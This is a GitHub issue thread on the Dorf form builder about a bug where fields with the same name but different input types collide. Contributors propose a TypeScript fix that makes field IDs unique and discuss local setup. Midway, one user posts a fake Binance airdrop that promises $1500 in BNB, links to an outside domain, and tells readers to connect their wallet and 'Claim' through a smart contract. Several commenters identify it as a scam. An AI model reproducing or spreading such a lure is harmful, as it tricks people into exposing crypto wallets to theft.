### ISSUE TITLE
When field have same name but different input type its causing error

### ISSUE THREAD

**Issue by imejis** [matheins/Dorf#5]

**Comment by imejis** [comment]
sample form

https://dorf.vercel.app/f/hvkfWSa

**Comment by Jontes-Tech** [comment]
I'm working on a fix, would this approach be bad to do?
```typescript
  const processedForm = {
    ...form,
    fields: form.fields.map((field) => ({
      ...field,
      id: `${field.id}-${field.type}`,
    })),
  }

  return (
    <div>
      <div className="space-y-8">
        <TypographyH1>{form.title}</TypographyH1>
        <TypographyLead>{form.description}</TypographyLead>
      </div>
      <Separator className="mb-8 mt-4" />
      <FormRenderer form={processedForm} />
    </div>
  )
  ```
However, I'm currently working on replicating production for dev, do I need Vercel KV to run locally or is that just caching? @matheins?

**Comment by Jontes-Tech** [comment]
I know this ain't the right place to ask but what do I put the oauth callback to in github oauth?

**Comment by imejis** [comment]
I think assigning id (**uuid**) to the field when designing the form will be more appropriate.
You can update value for that field's values by id while filling the form.

**Comment by imejis** [comment]
you mean redirect url?

**Comment by matheins** [comment]
@Jontes-Tech using the id to make the fields name unique makes absolute sense to me.

**Comment by matheins** [comment]
@Jontes-Tech actually using kv store from vercel is required. I think making it optional for local dev environment would make sense. Its used for rate limiting.

**Comment by imejis** [comment]
Just use environment variables.

**Comment by Jontes-Tech** [comment]
> @Jontes-Tech using the id to make the fields name unique makes absolute sense to me.

Yeah, we just can't display the randomness. Just use it for the programmatical things

**Comment by matheins** [comment]
@Jontes-Tech I just added a small step-by-step description on how to setup the project locally.

**Comment by tim-tepia** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @lukefor, @darcyturk, @amani1104, @msalbrain, @yahon1024, @lgs, @Gabrielbdd, @lesliecodes1, @ElectronSz, @BellamyBlack, @aprcode, @jiaoyk, @rugodata, @abdfnx, @QueenGladys1122, @ozzie00, @smorimoto, @matthew-github-123, @michael-mb, @Jarweb, @cryptoseabook, @vish0l, @superpdm, @hugo-k-m, @Miraakus, @allayli, @umgbhalla, @vkartaviy, @dhaba, @levantam2344, @blaze7frost, @trunkszi, @rail44, @phlezk, @ortolanrj, @Agoni223, @komorebi7369, @arpitBhalla, @hmen97, @c1982, @Firstero, @AntonioArts, @Fasani, @nining, @dsalin, @sabitm, @SinHongChen, @tjbtiller, @aliosmanyuksel, @luismayta

**Comment by Jontes-Tech** [comment]
I'm working on reporting this scammer

**Comment by phlezk** [comment]
I'm confused as to how my name even showed up there, lol. This scammer must be checking out who has "starred" a git/project. That's literally my only activity on this website, other than maybe a handful of comments, only.

**Comment by Jontes-Tech** [comment]
It's not even a crypto-related project :)
